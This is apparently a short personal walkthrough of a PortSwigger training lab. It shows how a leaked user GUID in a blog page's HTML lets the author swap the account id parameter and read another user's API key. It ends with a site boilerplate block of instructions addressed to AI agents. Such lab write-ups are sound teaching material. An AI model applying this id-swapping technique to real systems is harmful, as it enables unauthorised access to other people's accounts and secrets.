# User ID controlled by request parameter, with unpredictable user IDs

This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs. To solve the lab, find the GUID for carlos, then submit his API key as the solution. You can log in to your own account using the following credentials: wiener:peter

Upon entering my credentials and observing that the ID for my account is not simply a number, I proceed to navigate the site in an attempt to locate Carlos.

<figure><img src="/files/ty7TyMBIkERYGsVL5ZqE" alt=""><figcaption></figcaption></figure>

Came across one of carol's blogs on the site and inspected the html on the webpage. notice his account is was in the html of the page

<figure><img src="/files/EU8UALsQsW7o7qRpUgfZ" alt=""><figcaption></figcaption></figure>

I copy the element where his id was n put it in notepad

<figure><img src="/files/QTZL2dCxTfSB698GsBEo" alt=""><figcaption></figcaption></figure>

Log back into my account and swap the id to get the flag.

<figure><img src="/files/lLNaX7aoo6WMtmTcsYTW" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://itrp19-notes.gitbook.io/notes/reference/hacking/port-swigger/access-control/user-id-controlled-by-request-parameter-with-unpredictable-user-ids.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.